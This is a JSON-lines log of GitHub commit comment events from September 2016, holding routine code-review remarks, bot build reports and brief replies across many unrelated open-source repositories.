{"id":"4594498469","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19109204,"position":null,"line":null,"path":null,"commit_id":"a39cb8801b330a8be3e1d050842eb86c5d78d897","created_at":"2016-09-21T07:23:34Z","updated_at":"2016-09-21T07:23:34Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a39cb8801b330a8be3e1d050842eb86c5d78d897-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-21T07:23:34Z"}
{"id":"4594502566","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":19109210,"position":null,"line":null,"path":null,"commit_id":"81cb70a8cae681c70e3b1adb276d0ef93da3fc64","created_at":"2016-09-21T07:24:38Z","updated_at":"2016-09-21T07:24:38Z","body":"ありがとうございます。良いと思います。"}},"created_at":"2016-09-21T07:24:38Z"}
{"id":"4594511213","type":"CommitCommentEvent","actor":{"login":"ChrisRus"},"repo":{"name":"Hyzual/knotsjs"},"payload":{"comment":{"id":19109223,"position":21,"line":21,"path":"lib/dependencies.js","commit_id":"4e1d556f82b35ea7da494000cef08c5025fdb9fc","created_at":"2016-09-21T07:26:51Z","updated_at":"2016-09-21T07:26:51Z","body":"I am using jsgraph in several private projects and you should be aware of upcoming bug fix to `DirectedGraph` container serialization API methods. Hopefully you haven't encountered the issue yet but it's confusing enough to merit a quick explanation.\r\n\r\nCurrently, method `DirectedGraph.toJSON` incorrectly accepts input parameters, and returns a JSON-encoded string. As well, there's another method, `DirectedGraph.toObject` that returns a serializable JavaScript object.\r\n\r\nThis is wrong. `DirectedGraph.toJSON` should return a serializable JavaScript object in the expected format. It should not return a JSON-encoded string. In other words, it should behave exactly like `DirectedGraph.toObject` does currently.\r\n\r\nFor example if you create an array of references to DirectedGraph containers and call JSON.stringify on the array we would _expect_ to get a JSON document with an array root element containing N JSON objects each of which is a serialized DirectedGraph instance. But instead we get an array root element containing N strings that are the escaped JSON-encoded result of the current toJSON >:/ that sucks...\r\n\r\nIn Encapsule/jsgraph vNext:\r\n\r\n- Method `DirectedGraph.toJSON` has been renamed `DirectedGraph.stringify`\r\n- Method `DirectedGraph.toObject` has been renamed `DirectedGraph.toJSON` and accepts no in-params.\r\n- Method `DirectedGraph.toObject` is aliased to `DirectedGraph.toJSON`, is deprecated, and will be removed in vNext+?\r\n\r\nNote that these fixes are available in the [Encapsule/arccore](https://github.com/Encapsule/ARCcore) package which you can use as a bridge if you block before I port the source and test updates back to Encapsule/jsgraph.\r\n\r\n```\r\n$ node\r\n> var arccore = require('./index')\r\nundefined\r\n> var jsgraph = arccore.graph\r\nundefined\r\n> var response = jsgraph.directed.create()\r\nundefined\r\n> var digraph = response.result\r\nundefined\r\n> digraph.toJSON()\r\n{ name: '', description: '', vlist: [], elist: [] }\r\n> digraph.toObject()\r\n{ name: '', description: '', vlist: [], elist: [] }\r\n> digraph.stringify(undefined, 4)\r\n'{\\n    \"name\": \"\",\\n    \"description\": \"\",\\n    \"vlist\": [],\\n    \"elist\": []\\n}'\r\n> digraph.stringify()\r\n'{\"name\":\"\",\"description\":\"\",\"vlist\":[],\"elist\":[]}'\r\n> \r\n```\r\n"}},"created_at":"2016-09-21T07:26:51Z"}
{"id":"4594511804","type":"CommitCommentEvent","actor":{"login":"elebescond"},"repo":{"name":"SIGSEV/minus"},"payload":{"comment":{"id":19109224,"position":null,"line":null,"path":null,"commit_id":"758c874421cf5193e7a9fff26446d2ea66e82ee9","created_at":"2016-09-21T07:27:00Z","updated_at":"2016-09-21T07:27:00Z","body":"autoprefixer-loader module recommends using postcss-loader + autoprefixer modules"}},"created_at":"2016-09-21T07:27:00Z"}
{"id":"4594512422","type":"CommitCommentEvent","actor":{"login":"gearsdigital"},"repo":{"name":"lcdsantos/jQuery-Selectric"},"payload":{"comment":{"id":19109227,"position":124,"line":599,"path":"public/jquery.selectric.js","commit_id":"c78b153cb5a46cd633a5060d6a8e91c4f6fde8ac","created_at":"2016-09-21T07:27:09Z","updated_at":"2016-09-21T07:27:09Z","body":"This is a far better approach! This is maybe a stylistic issue but what would you think about this:\r\n\r\n```js\r\nif ( !(_this.state.multiple && _this.options.multiple.keepMenuOpen) )\r\n```\r\n\r\nI find it a bit more readable."}},"created_at":"2016-09-21T07:27:09Z"}
{"id":"4594513008","type":"CommitCommentEvent","actor":{"login":"thinkyhead"},"repo":{"name":"MarlinFirmware/Marlin"},"payload":{"comment":{"id":19109229,"position":null,"line":null,"path":null,"commit_id":"9a9e9afcf81a6eb7b7515df41bc2a1b099f8b849","created_at":"2016-09-21T07:27:18Z","updated_at":"2016-09-21T07:27:18Z","body":"Apparently these things are not actually readable. When in error state, I am told that they always show up as triggered."}},"created_at":"2016-09-21T07:27:18Z"}
{"id":"4594514262","type":"CommitCommentEvent","actor":{"login":"victor"},"repo":{"name":"TriyoTec/ProjetosProtheus"},"payload":{"comment":{"id":19109233,"position":null,"line":null,"path":null,"commit_id":"9dae07787774202c167057e977064333107b5033","created_at":"2016-09-21T07:27:37Z","updated_at":"2016-09-21T07:27:37Z","body":"👍 "}},"created_at":"2016-09-21T07:27:37Z"}
{"id":"4594515067","type":"CommitCommentEvent","actor":{"login":"hashd"},"repo":{"name":"Imaginea/imaginea-oss"},"payload":{"comment":{"id":19109239,"position":7,"line":7,"path":"js/imaginea-oss.js","commit_id":"2611e1c9e90ab6b16a485522b269248bc466063e","created_at":"2016-09-21T07:27:50Z","updated_at":"2016-09-21T07:27:50Z","body":"Handlebars, maybe?"}},"created_at":"2016-09-21T07:27:50Z"}
{"id":"4594519888","type":"CommitCommentEvent","actor":{"login":"gearsdigital"},"repo":{"name":"lcdsantos/jQuery-Selectric"},"payload":{"comment":{"id":19109251,"position":161,"line":634,"path":"public/jquery.selectric.js","commit_id":"c78b153cb5a46cd633a5060d6a8e91c4f6fde8ac","created_at":"2016-09-21T07:29:08Z","updated_at":"2016-09-21T07:29:08Z","body":"Like that naming."}},"created_at":"2016-09-21T07:29:08Z"}
{"id":"4594520614","type":"CommitCommentEvent","actor":{"login":"hholzgra"},"repo":{"name":"percona/percona-xtradb-cluster"},"payload":{"comment":{"id":19109252,"position":null,"line":null,"path":null,"commit_id":"47ce0237e452b19a225e59b67681746f4d94dfd2","created_at":"2016-09-21T07:29:19Z","updated_at":"2016-09-21T07:29:19Z","body":"\"nc -h\" writes help output to stderr, not stdout\r\n\r\nSo the feature check will always fail, and will write nc help output to the mysqld error log instead"}},"created_at":"2016-09-21T07:29:19Z"}
{"id":"4594521606","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"maksemuz/movies_rb"},"payload":{"comment":{"id":19109254,"position":21,"line":21,"path":"movie.rb","commit_id":"5292f4c640b3237e732d6eb36d53f39b701d4f11","created_at":"2016-09-21T07:29:35Z","updated_at":"2016-09-21T07:29:35Z","body":"а) зачем?\r\nб) получается, у нас будет сильный перекос статистики в сторону января, хорошо ли это?.."}},"created_at":"2016-09-21T07:29:35Z"}
{"id":"4594523904","type":"CommitCommentEvent","actor":{"login":"bajtos"},"repo":{"name":"strongloop/loopback-swagger"},"payload":{"comment":{"id":19109259,"position":null,"line":null,"path":null,"commit_id":"d2833dad8dab7112c0910ebeb9f3f5b684fa9a58","created_at":"2016-09-21T07:30:13Z","updated_at":"2016-09-21T07:30:13Z","body":"@Amir-61 The branch `loopback-2.x` is supposed to use LoopBack 2.x. Could you please revert this commit?"}},"created_at":"2016-09-21T07:30:13Z"}
{"id":"4594523919","type":"CommitCommentEvent","actor":{"login":"gearsdigital"},"repo":{"name":"lcdsantos/jQuery-Selectric"},"payload":{"comment":{"id":19109260,"position":152,"line":617,"path":"src/jquery.selectric.js","commit_id":"c78b153cb5a46cd633a5060d6a8e91c4f6fde8ac","created_at":"2016-09-21T07:30:13Z","updated_at":"2016-09-21T07:30:13Z","body":"Better now."}},"created_at":"2016-09-21T07:30:13Z"}
{"id":"4594524934","type":"CommitCommentEvent","actor":{"login":"gearsdigital"},"repo":{"name":"lcdsantos/jQuery-Selectric"},"payload":{"comment":{"id":19109264,"position":115,"line":582,"path":"src/jquery.selectric.js","commit_id":"c78b153cb5a46cd633a5060d6a8e91c4f6fde8ac","created_at":"2016-09-21T07:30:25Z","updated_at":"2016-09-21T07:30:25Z","body":"This is a far better approach! This is maybe a stylistic issue but what would you think about this:\r\n\r\n```js\r\nif ( !(_this.state.multiple && _this.options.multiple.keepMenuOpen) )\r\n```\r\n\r\nI find it a bit more readable."}},"created_at":"2016-09-21T07:30:25Z"}
{"id":"4594530033","type":"CommitCommentEvent","actor":{"login":"Bananeweizen"},"repo":{"name":"cgeo/cgeo"},"payload":{"comment":{"id":19109280,"position":null,"line":null,"path":null,"commit_id":"7559115d3c496d341045e27e5b1000d7d4a50877","created_at":"2016-09-21T07:31:42Z","updated_at":"2016-09-21T07:31:42Z","body":"> Do you think it is worth to open a feature request for \"load more caches\"?\r\n\r\nThis is not supported by OKAPI. We would have to first fetch N, then 2*N, then 3*N caches to \"simulate\" this. That's why I raised the limit.\r\n\r\n> The downside of this change is, that with gc.com and oc.de both active I always get 20 of gc.com and 100 of oc.de.\r\n\r\nYes, but when you repeatedly use \"Load more\", the number will become equal again at some point.\r\n"}},"created_at":"2016-09-21T07:31:42Z"}
{"id":"4594530446","type":"CommitCommentEvent","actor":{"login":"jdonaldson"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19109281,"position":null,"line":null,"path":null,"commit_id":"65903bcca29c753ba260c99ce76909bba49fefb0","created_at":"2016-09-21T07:31:48Z","updated_at":"2016-09-21T07:31:48Z","body":"I largely cribbed the makefile behavior off of genjs.  How does that factor in here?"}},"created_at":"2016-09-21T07:31:48Z"}
{"id":"4594530532","type":"CommitCommentEvent","actor":{"login":"gearsdigital"},"repo":{"name":"lcdsantos/jQuery-Selectric"},"payload":{"comment":{"id":19109282,"position":177,"line":637,"path":"src/jquery.selectric.js","commit_id":"c78b153cb5a46cd633a5060d6a8e91c4f6fde8ac","created_at":"2016-09-21T07:31:50Z","updated_at":"2016-09-21T07:31:50Z","body":"Same here: `if ( !(_this.state.multiple && _this.options.multiple.keepMenuOpen) )`. But as said it's a stylistic issue :)"}},"created_at":"2016-09-21T07:31:50Z"}
{"id":"4594537095","type":"CommitCommentEvent","actor":{"login":"meetakshay99"},"repo":{"name":"pristineio/webrtc-build-scripts"},"payload":{"comment":{"id":19109299,"position":null,"line":null,"path":null,"commit_id":"6a2c85f9692736ba92e5859d614655bcabdba060","created_at":"2016-09-21T07:33:30Z","updated_at":"2016-09-21T07:33:30Z","body":"\"WebRTC builds have moved to using GN instead of GYP. We currently don't have the capacity to update these. Feel free to fork and update them\" - Does this mean that it is no longer possible to build android and iOS webrtc with these scripts?"}},"created_at":"2016-09-21T07:33:30Z"}
{"id":"4594537147","type":"CommitCommentEvent","actor":{"login":"sergiogonzalez"},"repo":{"name":"brianchandotcom/liferay-portal"},"payload":{"comment":{"id":19109300,"position":5,"line":266,"path":"modules/apps/collaboration/document-library/document-library-service/src/main/java/com/liferay/document/library/internal/exportimport/data/handler/FileEntryStagedModelDataHandler.java","commit_id":"eb629472d7c8d4c5a286897a75efd3f52d27f0b5","created_at":"2016-09-21T07:33:31Z","updated_at":"2016-09-21T07:33:31Z","body":"Hey @brianchandotcom this shouldn't be necessary since we have a null check in line 250, that's why I removed it. "}},"created_at":"2016-09-21T07:33:31Z"}
{"id":"4594539785","type":"CommitCommentEvent","actor":{"login":"ctron"},"repo":{"name":"malikm/kura_windows_2"},"payload":{"comment":{"id":19109306,"position":null,"line":null,"path":null,"commit_id":"7693bd1b7dc26074cc88b91e398208fe1af4cb74","created_at":"2016-09-21T07:34:12Z","updated_at":"2016-09-21T07:34:12Z","body":"I would not recommend relying on \"wscript\". I do know from a lot of Windows admins which disabled Windows Scripting host altogether. I am not sure what the current situation of that is."}},"created_at":"2016-09-21T07:34:12Z"}
{"id":"4594540067","type":"CommitCommentEvent","actor":{"login":"gearsdigital"},"repo":{"name":"lcdsantos/jQuery-Selectric"},"payload":{"comment":{"id":19109308,"position":299,"line":891,"path":"src/jquery.selectric.js","commit_id":"c78b153cb5a46cd633a5060d6a8e91c4f6fde8ac","created_at":"2016-09-21T07:34:17Z","updated_at":"2016-09-21T07:34:17Z","body":"👍 Looks good to me."}},"created_at":"2016-09-21T07:34:17Z"}
{"id":"4594543249","type":"CommitCommentEvent","actor":{"login":"gearsdigital"},"repo":{"name":"lcdsantos/jQuery-Selectric"},"payload":{"comment":{"id":19109315,"position":340,"line":1012,"path":"src/jquery.selectric.js","commit_id":"c78b153cb5a46cd633a5060d6a8e91c4f6fde8ac","created_at":"2016-09-21T07:35:06Z","updated_at":"2016-09-21T07:35:06Z","body":"Thanks. I got a lot of typos..."}},"created_at":"2016-09-21T07:35:06Z"}
{"id":"4594551968","type":"CommitCommentEvent","actor":{"login":"NervosaX"},"repo":{"name":"cerebral/cerebral"},"payload":{"comment":{"id":19109343,"position":null,"line":null,"path":null,"commit_id":"90a3b42faf78102b184c9abb8483c21ae2916574","created_at":"2016-09-21T07:37:14Z","updated_at":"2016-09-21T07:37:14Z","body":"Oh, that's useful! "}},"created_at":"2016-09-21T07:37:14Z"}
{"id":"4594551979","type":"CommitCommentEvent","actor":{"login":"siddontang"},"repo":{"name":"pingcap/tidb"},"payload":{"comment":{"id":19109344,"position":null,"line":null,"path":null,"commit_id":"cfa61f51eb5d54a1260d520fbe961e90903e2a49","created_at":"2016-09-21T07:37:14Z","updated_at":"2016-09-21T07:37:14Z","body":"LGTM"}},"created_at":"2016-09-21T07:37:14Z"}
{"id":"4594552539","type":"CommitCommentEvent","actor":{"login":"Gasoonjia"},"repo":{"name":"NTHU-EE-CV-2015-Fall/homework0"},"payload":{"comment":{"id":19109348,"position":null,"line":null,"path":null,"commit_id":"9f8ebc781901e46b895687125de50db3ee64cfb0","created_at":"2016-09-21T07:37:22Z","updated_at":"2016-09-21T07:37:22Z","body":"\r\n[homework0-master 2.zip](https://github.com/NTHU-EE-CV-2015-Fall/homework0/files/484400/homework0-master.2.zip)\r\n"}},"created_at":"2016-09-21T07:37:22Z"}
{"id":"4594556971","type":"CommitCommentEvent","actor":{"login":"pschuele"},"repo":{"name":"geerlingguy/ansible-role-redis"},"payload":{"comment":{"id":19109355,"position":null,"line":null,"path":null,"commit_id":"f457d0c4f27ddda817b13cde69673ac1e3a1dd35","created_at":"2016-09-21T07:38:28Z","updated_at":"2016-09-21T07:38:28Z","body":"hi Jeff, thanks for fixing this :)"}},"created_at":"2016-09-21T07:38:28Z"}
{"id":"4594557827","type":"CommitCommentEvent","actor":{"login":"hholzgra"},"repo":{"name":"percona/percona-xtradb-cluster"},"payload":{"comment":{"id":19109358,"position":null,"line":null,"path":null,"commit_id":"47ce0237e452b19a225e59b67681746f4d94dfd2","created_at":"2016-09-21T07:38:42Z","updated_at":"2016-09-21T07:38:42Z","body":"Ok, on CentOS 7 (which this fix originally was for) help output indeed goes to stdout,\r\nbut on Ubuntu 16.04 it goes to stderr instead.\r\n\r\nAdding a 2>&1 redirect would make the check work for both without spamming the error log"}},"created_at":"2016-09-21T07:38:42Z"}
{"id":"4594558581","type":"CommitCommentEvent","actor":{"login":"tridge"},"repo":{"name":"ArduPilot/ardupilot"},"payload":{"comment":{"id":19109360,"position":null,"line":null,"path":null,"commit_id":"06cccd6d3b80c85184e07ece0788f324ca7af4d3","created_at":"2016-09-21T07:38:53Z","updated_at":"2016-09-21T07:38:53Z","body":"@khancyr yep, should be 100, well spotted! fixed\r\n@magicrub its a percentage\r\n"}},"created_at":"2016-09-21T07:38:53Z"}
{"id":"4594562727","type":"CommitCommentEvent","actor":{"login":"manumanfred"},"repo":{"name":"manumanfred/android_device_samsung_galaxys2plus-common"},"payload":{"comment":{"id":19109365,"position":7,"line":67,"path":"BoardConfigCommon.mk","commit_id":"653b9990fd9fa41ddc5c4b62b8c3d43fe2d5b18b","created_at":"2016-09-21T07:39:56Z","updated_at":"2016-09-21T07:39:56Z","body":"Shouldn't be needed for S2 plus. "}},"created_at":"2016-09-21T07:39:56Z"}
{"id":"4594564919","type":"CommitCommentEvent","actor":{"login":"gearsdigital"},"repo":{"name":"lcdsantos/jQuery-Selectric"},"payload":{"comment":{"id":19109368,"position":null,"line":null,"path":null,"commit_id":"c78b153cb5a46cd633a5060d6a8e91c4f6fde8ac","created_at":"2016-09-21T07:40:27Z","updated_at":"2016-09-21T07:40:27Z","body":"This is a good solution. Checked it locally and it seems to be fine.\r\n\r\nBut i've to mention that we broke support for Internet Explorer 7 and 8. `.filter()` and `.map()` are supported from IE9+. Do you want to stick with IE787? Then we should we refactor this to support IE7/8. What would you say?"}},"created_at":"2016-09-21T07:40:27Z"}
{"id":"4594572174","type":"CommitCommentEvent","actor":{"login":"agent009sa"},"repo":{"name":"agent009sa/read"},"payload":{"comment":{"id":19109380,"position":null,"line":null,"path":null,"commit_id":"a271b172bdc6855473172af9ef16c7a449f934db","created_at":"2016-09-21T07:42:15Z","updated_at":"2016-09-21T07:42:15Z","body":"agent009sa"}},"created_at":"2016-09-21T07:42:15Z"}
{"id":"4594572808","type":"CommitCommentEvent","actor":{"login":"kiorky"},"repo":{"name":"makinacorpus/corpus-django"},"payload":{"comment":{"id":19109381,"position":4,"line":19,"path":"src/project/settings/base.py","commit_id":"9641a1e63fb5a5adcd614dae555cbfabaf9eb910","created_at":"2016-09-21T07:42:25Z","updated_at":"2016-09-21T07:42:25Z","body":"let this variable be, not all projects may be named 'project', we cant let it be a static var."}},"created_at":"2016-09-21T07:42:25Z"}
{"id":"4594573129","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19109383,"position":null,"line":null,"path":null,"commit_id":"ee5f2d18ffd0807abd15b7f27b43f7bd2050c600","created_at":"2016-09-21T07:42:30Z","updated_at":"2016-09-21T07:42:30Z","body":"Sizing-Simple-Chilled-Ceiling (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1767 of 1767 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee5f2d18ffd0807abd15b7f27b43f7bd2050c600-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee5f2d18ffd0807abd15b7f27b43f7bd2050c600-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee5f2d18ffd0807abd15b7f27b43f7bd2050c600-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.13%25-green.svg)</a>\n"}},"created_at":"2016-09-21T07:42:30Z"}
{"id":"4594573607","type":"CommitCommentEvent","actor":{"login":"AxelMessaoudi"},"repo":{"name":"AxelMessaoudi/MonPremierGit"},"payload":{"comment":{"id":19109384,"position":2,"line":1,"path":"ProjectBidonDeLaurent/src/ClasseQuiSertARien.java","commit_id":"ac45cafc7b930b2f87e7d97a83c197ad9537b9b6","created_at":"2016-09-21T07:42:37Z","updated_at":"2016-09-21T07:42:37Z","body":"test"}},"created_at":"2016-09-21T07:42:37Z"}
{"id":"4594576205","type":"CommitCommentEvent","actor":{"login":"apupier"},"repo":{"name":"fusesource/fuseide"},"payload":{"comment":{"id":19109391,"position":82,"line":165,"path":"editor/tests/org.fusesource.ide.projecttemplates.tests.integration/src/main/java/org/fusesource/ide/projecttemplates/tests/integration/wizards/FuseIntegrationProjectCreatorRunnableIT.java","commit_id":"d89b0551746188a1532c93c6d6f4458518008b3b","created_at":"2016-09-21T07:43:17Z","updated_at":"2016-09-21T07:43:17Z","body":"I don't understand this. We want to detect the case of all errors."}},"created_at":"2016-09-21T07:43:17Z"}
{"id":"4594580356","type":"CommitCommentEvent","actor":{"login":"meriadec"},"repo":{"name":"SIGSEV/minus"},"payload":{"comment":{"id":19109399,"position":null,"line":null,"path":null,"commit_id":"758c874421cf5193e7a9fff26446d2ea66e82ee9","created_at":"2016-09-21T07:44:22Z","updated_at":"2016-09-21T07:44:22Z","body":"Yes :/ but we have taken the decision to remove PostCSS (see [this comment by MoOx](https://github.com/facebookincubator/create-react-app/issues/130#issuecomment-246801178) which explain a lot), so it is not an option anymore. Sadly, PostCSS doesn't allow to transform real Sass (only \"Sass-like\" with [precss](https://github.com/jonathantneal/precss)), and the Sass language is much more mature."}},"created_at":"2016-09-21T07:44:22Z"}
{"id":"4594587205","type":"CommitCommentEvent","actor":{"login":"kfriedberger"},"repo":{"name":"sosy-lab/benchexec"},"payload":{"comment":{"id":19109411,"position":null,"line":null,"path":null,"commit_id":"2eabb575c065c6087d817844d7b51297519e5732","created_at":"2016-09-21T07:46:00Z","updated_at":"2016-09-21T07:46:00Z","body":"somehow commit-message got lost:\r\n\"fixing buttons on clicking 'reset', 'inverse-filter' was not removed.\""}},"created_at":"2016-09-21T07:46:00Z"}
{"id":"4594587388","type":"CommitCommentEvent","actor":{"login":"gearsdigital"},"repo":{"name":"lcdsantos/jQuery-Selectric"},"payload":{"comment":{"id":19109413,"position":62,"line":341,"path":"src/jquery.selectric.js","commit_id":"c78b153cb5a46cd633a5060d6a8e91c4f6fde8ac","created_at":"2016-09-21T07:46:03Z","updated_at":"2016-09-21T07:46:03Z","body":"We can reduce the cyclomatic complexity a bit here.\r\n\r\n```js\r\nif ( _this.options.multiple.maxLabelEntries && labelMarkup.length >= _this.options.multiple.maxLabelEntries + 1 )\r\n```"}},"created_at":"2016-09-21T07:46:03Z"}
{"id":"4594589720","type":"CommitCommentEvent","actor":{"login":"ishantvivek"},"repo":{"name":"manumanfred/android_device_samsung_galaxys2plus-common"},"payload":{"comment":{"id":19109423,"position":7,"line":67,"path":"BoardConfigCommon.mk","commit_id":"653b9990fd9fa41ddc5c4b62b8c3d43fe2d5b18b","created_at":"2016-09-21T07:46:40Z","updated_at":"2016-09-21T07:46:40Z","body":"Oh. S2 plus is single sim?"}},"created_at":"2016-09-21T07:46:40Z"}
{"id":"4594589986","type":"CommitCommentEvent","actor":{"login":"lukasbischof"},"repo":{"name":"TheFehr/hello-world"},"payload":{"comment":{"id":19109426,"position":6,"line":9,"path":"hello-world.java","commit_id":"a5f28a18f8bd7264981fde9fd8574ca1abc86fce","created_at":"2016-09-21T07:46:44Z","updated_at":"2016-09-21T07:46:44Z","body":"huhu"}},"created_at":"2016-09-21T07:46:44Z"}
{"id":"4594590644","type":"CommitCommentEvent","actor":{"login":"lukasbischof"},"repo":{"name":"TheFehr/hello-world"},"payload":{"comment":{"id":19109431,"position":4,"line":7,"path":"hello-world.java","commit_id":"a5f28a18f8bd7264981fde9fd8574ca1abc86fce","created_at":"2016-09-21T07:46:53Z","updated_at":"2016-09-21T07:46:53Z","body":"Ish ja krass"}},"created_at":"2016-09-21T07:46:53Z"}
{"id":"4594591101","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19109432,"position":4,"line":536,"path":"src/FffPolygonGenerator.cpp","commit_id":"9ba3e301d615e0c42fb6bbed8a2c4771341850c4","created_at":"2016-09-21T07:46:59Z","updated_at":"2016-09-21T07:46:59Z","body":"fixed"}},"created_at":"2016-09-21T07:46:59Z"}
{"id":"4594593420","type":"CommitCommentEvent","actor":{"login":"afeld"},"repo":{"name":"startup-systems/mashup"},"payload":{"comment":{"id":19109441,"position":null,"line":null,"path":null,"commit_id":"2970d98477cfe309d48c4f9e01566648eedbb930","created_at":"2016-09-21T07:47:34Z","updated_at":"2016-09-21T07:47:34Z","body":"/cc https://github.com/zrrrzzt/html-validator-cli/pull/4"}},"created_at":"2016-09-21T07:47:34Z"}
{"id":"4594600431","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19109454,"position":30,"line":49,"path":"src/raft.cpp","commit_id":"ceff626d8774a0449a99000674fe3609d7199e9a","created_at":"2016-09-21T07:49:12Z","updated_at":"2016-09-21T07:49:12Z","body":"No airgap is applied as is.\r\n\r\nRest fixed."}},"created_at":"2016-09-21T07:49:12Z"}
{"id":"4594601024","type":"CommitCommentEvent","actor":{"login":"lhein"},"repo":{"name":"fusesource/fuseide"},"payload":{"comment":{"id":19109462,"position":82,"line":165,"path":"editor/tests/org.fusesource.ide.projecttemplates.tests.integration/src/main/java/org/fusesource/ide/projecttemplates/tests/integration/wizards/FuseIntegrationProjectCreatorRunnableIT.java","commit_id":"d89b0551746188a1532c93c6d6f4458518008b3b","created_at":"2016-09-21T07:49:22Z","updated_at":"2016-09-21T07:49:22Z","body":"removed it"}},"created_at":"2016-09-21T07:49:22Z"}
{"id":"4594604772","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19109471,"position":7,"line":79,"path":"src/FffGcodeWriter.cpp","commit_id":"a70fdfb9171a66ca249bb1857b4682078392dc04","created_at":"2016-09-21T07:50:14Z","updated_at":"2016-09-21T07:50:14Z","body":"Only if there was support between the model and the raft on the first layer.\r\nThis just copies the support areas generated on the first layer to below the first layer."}},"created_at":"2016-09-21T07:50:14Z"}
{"id":"4594606383","type":"CommitCommentEvent","actor":{"login":"Jhno591"},"repo":{"name":"Jhno591/Citra"},"payload":{"comment":{"id":19109473,"position":null,"line":null,"path":null,"commit_id":"a671a254559bff4aa71e9e38dd31134c5a62d778","created_at":"2016-09-21T07:50:37Z","updated_at":"2016-09-21T07:50:37Z","body":"It's OK i'll try 4 this one - https://github.com/DaMan69/citra/commit/5ec1f26d2458c20d7ec3653ef34fef6f2ec1a826"}},"created_at":"2016-09-21T07:50:37Z"}
{"id":"4594607847","type":"CommitCommentEvent","actor":{"login":"manumanfred"},"repo":{"name":"manumanfred/android_device_samsung_galaxys2plus-common"},"payload":{"comment":{"id":19109476,"position":7,"line":67,"path":"BoardConfigCommon.mk","commit_id":"653b9990fd9fa41ddc5c4b62b8c3d43fe2d5b18b","created_at":"2016-09-21T07:50:58Z","updated_at":"2016-09-21T07:50:58Z","body":"Yes, it is."}},"created_at":"2016-09-21T07:50:58Z"}
{"id":"4594608485","type":"CommitCommentEvent","actor":{"login":"mrward"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":19109477,"position":100,"line":132,"path":"main/src/addins/MonoDevelop.PackageManagement/MonoDevelop.PackageManagement/PackageManagementProjectOperations.cs","commit_id":"f9775303496729c96a3e661ea6572790f507fe78","created_at":"2016-09-21T07:51:08Z","updated_at":"2016-09-21T07:51:08Z","body":"Interesting. This is not directly used by the NuGet addin itself when installing NuGet packages for a new project template. It is used by the Components and I believe telemetry. Components always runs it from a background thread. So I am guessing something else is not doing that and using the UI thread directly if you are seeing a deadlock. Can you tell what is calling it from a thread dump?"}},"created_at":"2016-09-21T07:51:08Z"}
{"id":"4594610453","type":"CommitCommentEvent","actor":{"login":"KSXGitHub"},"repo":{"name":"doggybrainguys/bai-lam"},"payload":{"comment":{"id":19109480,"position":null,"line":null,"path":null,"commit_id":"ae2ba3df13041af1369f1e872d608d134b3323df","created_at":"2016-09-21T07:51:37Z","updated_at":"2016-09-21T07:51:37Z","body":"Quá Pro"}},"created_at":"2016-09-21T07:51:37Z"}
{"id":"4594610496","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/ribir"},"payload":{"comment":{"id":19109481,"position":null,"line":null,"path":null,"commit_id":"39148fe506310abd05097d6cb62aad93add7be5b","created_at":"2016-09-21T07:51:38Z","updated_at":"2016-09-21T07:51:38Z","body":"[tests/testthat/test-add_outgroup_to_phylogeny.R:42:1:](https://github.com/richelbilderbeek/ribir/blob/39148fe506310abd05097d6cb62aad93add7be5b/tests/testthat/test-add_outgroup_to_phylogeny.R#L42) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```"}},"created_at":"2016-09-21T07:51:38Z"}
{"id":"4594612805","type":"CommitCommentEvent","actor":{"login":"030"},"repo":{"name":"weareinteractive/ansible-ufw"},"payload":{"comment":{"id":19109485,"position":null,"line":null,"path":null,"commit_id":"a856fc3d2327764995cad8d428744e4f66f63da2","created_at":"2016-09-21T07:52:10Z","updated_at":"2016-09-21T07:52:10Z","body":"```\r\n { port: 22, rule: allow }\r\n```\r\nallow not required?"}},"created_at":"2016-09-21T07:52:10Z"}
